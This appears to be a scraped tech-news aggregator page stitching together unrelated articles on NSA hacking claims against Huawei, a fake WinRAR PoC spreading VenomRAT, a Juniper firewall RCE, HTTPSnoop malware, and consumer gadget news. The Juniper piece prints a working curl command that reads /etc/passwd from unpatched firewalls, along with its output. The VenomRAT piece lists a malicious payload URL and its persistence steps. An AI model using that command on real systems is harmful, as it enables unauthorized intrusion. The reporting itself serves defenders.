China Accuses the US of Hacking Huawei Servers Since 2009

0
[ad_1]

Huawei is known for its telecommunications equipment and consumer electronics, including smartphones, and the USA banned Huawei primarily due to national security concerns.

As the Chinese government may utilize Huawei’s technology for spying, the U.S. government claimed that the business constituted a security concern.

China recently acknowledged the NSA’s hacking of Huawei servers, a decade after the Snowden leak.

The Ministry of State Security report states that the NSA conducted repeated, systematic attacks to steal China’s important data through its TAO (Tailored Access Operations).

Huawei’s Servers Have been Hacked for Years

Since 2009, TAO, which is now Computer Network Operations, has hacked Huawei HQ servers and maintained surveillance.

TAO is the cyberwarfare intelligence-gathering unit of NSA, which is now known as Computer Network Operations, targeted Huawei’s sealed Shenzhen headquarters in documents revealed by Snowden in 2013.

Besides this, the Northwestern Polytechnical University’s hacking in September 2022 highlights China’s increased exposure to US cyber espionage, as per the ministry report.

The ministry’s report follows its identification of NSA operatives during a cyberattack on Northwestern Polytechnical University, with a pledge to eliminate all “digital spies” less than a week earlier.

The following report reveals the NSA’s extensive cyberattack capabilities and lists several weapons used for over a decade against multiple countries:-

“Uncovering the main despicable means of cyberattacks and secret theft by US intelligence agencies.”

The US government allegedly used the Foreign Intelligence Surveillance Act to compel businesses to unlock system back doors. It gave examples of access to location and data using X-Mode Social and Anomaly Six.

According to Snowden’s papers, the NSA targeted Huawei to obtain information on their equipment and keep tabs on executive communications.

The covert operation, referred to as Shotgiant, aimed at taking advantage of Huawei’s technological capabilities. The objective was to enable the National Security Agency (NSA) to tap into computer and phone networks through the equipment sold by Huawei to countries that steer clear of purchasing American products, as well as those who are allies of the United States.

NSA access to worldwide networks was the goal of Operation Shotgiant, which sought to take advantage of Huawei technology. It also looked into Huawei’s connections to the Chinese military, but the records offered no convincing proof.

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.


[ad_2]
Source link

Fake PoC Script Used to Trick Researchers into Downloading VenomRAT

0
[ad_1]

KEY FINDINGS

  • A new malware campaign is targeting the CVE-2023-40477 vulnerability in WinRAR.
  • The campaign uses a fake proof-of-concept (PoC) script to trick researchers into downloading and executing a VenomRAT payload.
  • The threat actors behind the campaign may be targeting researchers in order to gain access to their systems and steal their data.
  • Palo Alto Networks recommends that users update WinRAR to the latest version and be careful about clicking on links in emails and on social media.
  • If you believe that you may have been infected with this malware, you should immediately contact your IT security team.

Security researchers at Palo Alto Networks have discovered a new malware campaign targeting the CVE-2023-40477 vulnerability in WinRAR. The campaign uses a fake proof-of-concept (PoC) script to trick researchers into downloading and executing a VenomRAT payload.

The fake PoC script is based on a publicly available PoC code for a vulnerability in GeoServer tracked by CVE-2023-25157. The code has been modified to remove comments regarding details about the CVE-2023-25157 vulnerability and to add additional code that downloads and executes a batch script with a comment of “Check dependency.”

It’s worth noting that @AabyssZG, a Chinese cybersecurity researcher and founder of Yuanlong Sec Security Team (AabyssTeam), was the first to discover the fake PoC script, which was hosted in a GitHub repository by a user named whalersplonk.

Fake PoC Script Used to Trick Researchers into Downloading VenomRAT

According to Palo Alto Networks’ blog post, the batch script creates a batch file in %TEMP%/bat.bat that reaches out to the following URL and runs the response:

hxxp://checkblacklistwords[.]eu/check.php

The downloaded PowerShell script downloads an executable from checkblacklistwordseu/words.txt and saves it to %APPDATA%\Drivers\Windows.Gaming.Preview.exe. The PowerShell script not only runs the executable but also creates a scheduled task named Windows.Gaming.Preview that runs the executable every three minutes to persistently run the payload.

The Windows.Gaming.Preview.exe executable is a variant of VenomRAT, which is a remote access trojan (RAT). VenomRAT can be used to steal data, execute commands on the victim’s system, and control the system remotely.

Palo Alto Networks researchers believe that the threat actor behind this campaign is targeting researchers in order to gain access to their systems and steal their data. The researchers also believe that the threat actor may be using the compromised systems to launch further attacks against other organizations.

An unknown threat actor attempted to compromise individuals by releasing a fake PoC after the vulnerability’s public announcement, to exploit an RCE vulnerability in a well-known application. This PoC is fake and does not exploit the WinRAR vulnerability, suggesting the actor tried to take advantage of a highly sought-after RCE in WinRAR to compromise others. The fake PoC is based on publicly available code for a vulnerability in GeoServer that sets off an infection chain that installs VenomRAT. While we cannot provide accurate figures on the impact or number of compromises, we saw that the instructional video provided by the actor along with the fake exploit script had 121 views.

Palo Alto Networks – Unit 42

Timeline of Events

The following is a timeline of events surrounding this incident:

  • June 8, 2023: The Zero Day Initiative discloses the CVE-2023-40477 vulnerability to WinRAR.
  • July 16, 2023: The threat actor sets up the checkblacklistwordseu domain.
  • August 17, 2023: The Zero Day Initiative publicly releases information about the CVE-2023-40477 vulnerability.
  • August 21, 2023: The threat actor commits the fake PoC script to GitHub.
  • August 22, 2023: The threat actor uploads a video to Streamable demonstrating how to use the fake PoC script.
  • August 25, 2023: The Streamable video expires.

Recommendations

Palo Alto Networks recommends that users take the following steps to protect themselves from this malware campaign:

  • Update WinRAR to the latest version.
  • Be careful about clicking on links in emails and on social media.
  • Do not download and execute files from untrusted sources.
  • Use a security solution that can detect and block malware.

If you believe that you may have been infected with this malware, you should immediately contact your IT security team.

  1. The Best Way to Install and Set-Up WinRAR 64-bit
  2. Researcher release PoC exploit for 0-day in Chrome
  3. Hackers Publish PoC of Zero-day Flaw in Windows on Twitter
  4. WinRAR vulnerability allowed attackers to remotely hijack systems
  5. Hackers are using 19-year-old WinRAR bug to install nasty malware

[ad_2]
Source link

Grab the Baseus 6,000mAh Battery Pack with MagSafe & USB-C PD

0
[ad_1]

Amazon, right now has a really great deal on the Baseus 6,000mAh Portable Power Bank, which does use MagSafe. Currently, it is on sale for $19.94, which is a really great price for this product.

But in order to get this price, you’ll need to clip the 25% coupon on page, and also enter this promo code: A20P85FS at checkout, which will bring it all the way down to $19.94. The regular price for this is $49.99, so this is a fantastic price, to be quite honest.

This battery pack is one of my favorites, really any of the MagSafe ones are. Since you can just attach it to the back of your iPhone and start charging. It also has a USB-C PD port so you can plug in for faster charging if you need it.

Since this is a 6,000mAh capacity battery, it’s actually pretty slim on the back of your iPhone. So it’s not as bulky to use for an hour or so while it charges. But it will only get you about one full charge, maybe a little bit more, depending on your iPhone.

You can pick up the Baseus MagSafe Battery Pack from Amazon by clicking the link below.

Baseus MagSafe Battery Pack – Amazon


[ad_2]
Source link

Get a 360-Audio Experience with Room Adaptation and Spatial Audio

0
[ad_1]

Amazon has kicked off its Fall Hardware Event, live from HQ2. And the first product is the new Echo Show 8. It has a bit of a design change here, but looking right at it, you might not notice the difference.

The biggest design difference is the backside, which has a different shape now. This is due to the customized audio inside, which makes this smart display sound really good too. Of course, this is a smart speaker, so that part is also pretty important. It’ll have “spacial audio” and “room adaptation” software. Which will make it similar to what Sonos speakers are able to do. Let’s hope Sonos doesn’t sue Amazon again.

Amazon claims that the Echo Show 8 will make Alexa about 40% faster. This is a pretty big deal, since Alexa is pretty slow on its smart displays. Especially when compared to its Echo smart speakers.

Amazon says that there are over a billion devices connected to Alexa. Whether that is the Echo, or other smart home products, it’s clear that Alexa is a pretty pivotal part of the smart home experience. Many use it for alarms and timers, as well as the smart home, which Amazon’s David Limp says is up 25% year-over-year.

The new Echo Show 8 also uses some pretty dynamic UI abilities with the weather app. It uses a larger font size when the user is farther away from the screen, and changes to a different view as they get closer. It’s pretty similar to what Google has in its Nest Hub devices.

When can I buy the Echo Show 8?

Echo Show 8 will be available for $149, pre-orders start today and start shipping next month. Now this is a $20 price increase over the previous generation Echo Show 8. But given the inflation that we’ve all been dealing with over the last two years, that is not as big of a surprise.

Amazon is going to launch it in two colors: black and white.

Pre-Order Amazon Echo Show 8 – Amazon


[ad_2]
Source link

WhatsApp announces better online shopping experience, new business features

0
[ad_1]
WhatsApp is trying to create new experiences in addition to the basic chat experience that everyone knows and loves. Businesses and business-oriented features have been the focus of WhatsApp’s development strategy for quite some time, but few projects have materialized in actual features that users can take advantage of.Early this week, WhatsApp announced Flows, a new purchase service that allows users to buy products and services directly within the app. Either is a train ticket, a meal or an appointment booking, Flows is supposed to make the purchasing experience in WhatsApp as simple and snappy as possible.

WhatsApp promised to make Flows available to businesses around the world, at least those that use the WhatsApp Business Platform, in the coming weeks. Flows will allow businesses to provide WhatsApp users with menus and customizable forms that support their needs.

In addition, WhatsApp announced that it’s making it easier to complete a purchase directly in the chat. First, users in India will be able to add items to their car and send a payment using one of the various supported methods like UPI apps, debit and credit cards, and more. To make the purchase experience safe and simple, WhatsApp is working with partners like Razorpay and PayU.
Finally, WhatsApp is introducing a verification process, which will provide Meta Verified statuses to businesses that successfully demonstrate their authenticity. Those businesses will receive a verified badge, enhanced account support and impersonation protection, WhatsApp says.

Furthermore, Meta Verified will offer some additional premium features for interested businesses, including the ability to create a custom WhatsApp page discoverable via a web search, as well as multi-device support.

WhatsApp will start testing the Meta Verified feature with small businesses using the WhatsApp Business app very soon, so this won’t be available to businesses on the WhatsApp Business Platform yet.


[ad_2]
Source link

Juniper Firewalls Vulnerable to Unauthenticated Code Execution

0
[ad_1]

At the end of August 2023, Juniper Networks released a security advisory mentioning the CVE-2023-36845 vulnerability affecting SRX and EX series firewalls. The vulnerability was categorized as a Medium (5.3) severity vulnerability. 

Following this, security researchers at watchtowr published a method that could exploit this vulnerability along with the proof of concept. This particular report included the exploitation of the do_fileUpload function inside the webauth_operation.php file in the J-Web interface of the SRX firewalls. 

After this method, several threat actors started to target the webauth_operation.php file to exploit vulnerable Juniper Firewalls.

Security researchers have discovered a new method that could perform an unauthenticated remote code execution without uploading any files (watchTowr method).

Document
Get a Demo

With DoControl, you can keep your SaaS applications and data safe and secure by creating workflows tailored to your needs. It’s an easy and efficient way to identify and manage risks. You can mitigate the risk and exposure of your organization’s SaaS applications in just a few simple steps.

File Upload Not available = PHPRC + cURL

As part of the analysis, researchers purchased an SRX210 firewall and tried to exploit it using the watchTowr file upload method. Unfortunately, it was not possible as the do_fileUpload was unavailable on the specified firewall.

On investigating further, researchers discovered that Juniper firewalls use an Appweb server which invokes a CGI script. This CGI script uses multiple environment variables and arguments for accessing the user’s HTTP request. Additionally, these firewalls run on FreeBSD that can access stdin by opening /dev/fd/0.

Initially, a curl request was sent with the auto_prepend_file=”/etc/passwd” which resulted in successfully leaking the information of the /etc/passwd file.

However, in order to achieve remote code execution, researchers enabled the allow_url_include feature and sent a curl request to the firewall.

This time, the request included allow_url_include,  auto_prepend_file and data:// (embedded with  <? phpinfo(); ?>) which resulted in an unauthenticated code execution. 

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwd\n”‘ -F ‘PHPRC=/dev/fd/0’
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
ext:*:39:39:External applications:/:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
  <meta http-equiv=”Content-Type” content=”text/html”/>
  <link rel=”stylesheet” href=”/stylesheet/juniper.css” type=”text/css”/>
  <title>Log In – Juniper Web Device Manager</title>
  <link rel=”shortcut icon” href=’images/favicon.ico’ type=”image/x-icon”/>
</head>
Unauthenticated RCE Output (Source: VulnCheck)

Furthermore, a complete report has been published by Vulncheck, which also included shocking information that nearly 15,000 internet-facing Juniper firewalls were yet to be patched. 

Nevertheless, researchers also published a GitHub repository that contains a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable.

Organizations using Juniper Firewalls are recommended to upgrade to the latest version as per the security advisory released by Juniper Networks in order to prevent threat actors from leveraging these methods for exploitation.

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.


[ad_2]
Source link

Max viewers, get ready for free live sports!

0
[ad_1]

Recently, HBO Max and Discovery+ merged into one unified platform called Max, and it includes content from both platforms. It’s one of the more prominent streaming services on the market, and it’s about to get better. According to Engadget, Max will offer live sports for a limited time.

If you’re interested in trying out Max, you can get a plan starting at $9.99/month ($99.99/year) with ads. If you don’t want ads, then you can pay the $15.99/month ($149.99/year). At the top tier, you can pay $19.99/month ($199.99/year) for the Ultimate plan. This one has 4K video, Dolby Atmos audio, up to 100 downloads, and up to four screens at a time.

Free live sports are coming to Max

If you’re a sports fan, and you’re looking to keep up with all of your favorite games, then you’re going to love this offer. If you have Max, there’s a service addon called the Bleajer Report. This addon gives you access to tons of sports content. You’re able from MLB, NBA, NHL, US Soccer, and NCAA.

Along with live sports, there’s a large reservoir of on-demand sports content that you can watch. So, you get the full package with this addon.

Normally, the Bleacher Report costs $10/month with your Max subscription. However, there’s a promotion going on for US users. For a limited time, you can add the Bleacher Report to your plan for no charge. This applies to you if you have either the ad-free tiers or the ad-supported tier.

Important dates

This promotion isn’t active just yet. It will start officially on October 5th, and you’ll get the package for six months. You’ll be able to watch your content until April 2024. However, you only get it for six months if you sign up on day one; no matter when you sign up, it will still end in April 2024.

Also, you have a limited time to take advantage of this offer. You have until February 29th, 2024 activate the offer. After that, you’ll need to pay the $10/month.


[ad_2]
Source link

iPhone 15 Models Unveil New Battery Cycle Count Feature

0
[ad_1]

Now that the iPhone 15 review embargo has lifted, we’re starting to see some bits about what is actually new in the operating system on the new iPhone 15. Outside of what iOS 17 has brought to other iPhones.

And that newest feature is, a way to see your battery cycle count. This is really a lot more indicative of how your battery health is doing, versus a percentage. Because batteries are rated for a certain number of cycles, typically around 800 for an iPhone. Now, on top of that, the iPhone 15 is also showing the manufacture data and the first use. So you can really see how old your battery is.

Now this information is not new, so it’s hard to see why this is only on the iPhone 15. Since there are literally Shortcuts made to give you this information from an analytics file on your iPhone. But maybe this will be added in the future, to older iPhones, possibly in a iOS 17.1 update.

How to find your battery cycle count on iPhone 15

Since we don’t yet have an iPhone 15 in hand (Friday!) we have to rely on information from other users. And according to Ray Wong, you can find your battery cycle count from the Settings > General > About screen. Interesting that it is not available on the battery health screen in the battery section.

What is an actual battery cycle? Well, to put it in laymans terms, it’s when your battery does a 100% recharge. So if your battery is down to 20% and you charge it up to 100%, that’s not a full cycle yet, that’s only 80% of one. If you charge it again from 80% to 100%, then it’s now a full cycle. So it’s not each time you charge to 100%, which is important to note here.

Apple has also added a new setting in the iPhone 15 that will prevent devices from charging beyond 80%. This is also going to help you prolong your battery health, but I’d recommend just using your phone. No sense in cutting off a fifth of your battery just to get it to last another year or so. Especially when a battery replacement is less than $100.


[ad_2]
Source link

TikTok to tell on your AI content if you forget to brand it as AI-generated

0
[ad_1]

TikTok is now on a mission to help users distinguish between reality and computer-generated fantasy after the ByteDance app spoiled content creators with AI filters in the first place. TikTok wants you to confess and inform your followers if you’ve used AI in your viral 30-second video. And, if you for some reason forget to do so, the app will do it for you.The famous (and in a growing number of states – infamous) app is now launching a new tool to help creators label their AI-generated content (via Engadget). It should be rolled out as soon as this week and according to TikTok, the change will serve two purposes: “to empower creativity” and to give people an “important context about content they’re viewing”.

In other words, viewers have to be informed that what they’re seeing is AI-generated. According to TikTok, such content “can potentially confuse or mislead viewers if they’re not aware content was generated or edited with AI”. The new AI warning label should be used when the content is significantly altered or modified by AI technology.

You can expect TikTok’s AI effects to be renamed and to explicitly include “AI” in their name and corresponding effects label so that everybody knows what you’ve been using.

This will also make it easier to comply with TikTok’s Community Guidelines’ synthetic media policy, which was introduced earlier this year. That’s the policy that makes AI labeling not exactly optional because it requires creators to label their content as AI-generated if it contains realistic images, audio or video.

The new tool is not the only way to make the announcement – there are other types of disclosures, like a sticker or caption. But if they were used often enough in the first place, maybe there wouldn’t be a need for the release of this new tool.

If you somehow forget to disclose the AI usage in your short video, TikTok is making sure that you don’t escape the labeling machine. The ByteDance-owned app is developing its own algorithm that will scan and label any AI-generated content on the platform. So, if you happen to record a truly outstanding out-of-this-world video, don’t be surprised if it’s labeled as AI. Cut the algorithm some slack…


[ad_2]
Source link

Hackers Attacking Telecoms Servers With HTTPSnoop Malware

0
[ad_1]

In 2022, state-sponsored actors and advanced adversaries consistently targeted telecoms globally, making it a top sector in Talos IR cases.

Telecom firms with critical infrastructure assets are prime targets due to their role in national networks and as potential gateways for adversaries.

Cybersecurity researchers at Cisco Talos recently found a new malware, “HTTPSnoop,” targeting Middle East telecom companies, using unique methods to interface with Windows HTTP kernel drivers for URL-based content execution.

The implant cluster, including HTTPSnoop and PipeSnoop, with unique TTPs, is attributed to a new intrusion set named “ShroudedSnooper” as it doesn’t match known groups tracked by Talos.

Document
FREE Demo

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Variants of HTTPSnoop

In total, the attackers built three variants of HTTPSnoop:-

  • Variant 1: DLL-based HTTPSnoop variants use DLL hijacking in benign apps, with the first variant from April 17, 2023, binding to HTTP URLs resembling Microsoft’s EWS API for shellcode execution.
  • Variant 2: The second variant, created on April 19, 2023, resembles the initial HTTPSnoop version but targets different HTTP URLs on Ports 80 and 443, possibly for a non-EWS web server that is exposed.
  • Variant 3: Later, they created a third variant with a killswitch URL and another listening URL on April 29, 2023, likely to lower detection risks by limiting the URLs.

HTTPSnoop Malware Interface

HTTPSnoop and PipeSnoop posed as components of Palo Alto Networks’ Cortex XDR app, with altered compile timestamps suggesting operation during the v7.8 window (Aug 2022 – Apr 2023).

HTTPSnoop is a basic but efficient backdoor that does the following things:-

  • Uses low-level Windows APIs to interact with HTTP devices
  • Listen for specific URL patterns
  • Executes decoded shellcode from incoming requests

There are two key components that the analyzed DLL consists of, and here below, we have mentioned them:-

  • Encoded Stage 2 shellcode.
  • Encoded Stage 2 configuration.

The activated malicious DLL XOR also decodes and runs the Stage 2 configuration and shellcode.

Single byte XOR routine (Source – Cisco Talos)

PipeSnoop, created in May 2023, is a distinct implant designed for different environments and likely used in enterprises with IPC pipe I/O capabilities.

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.


[ad_2]
Source link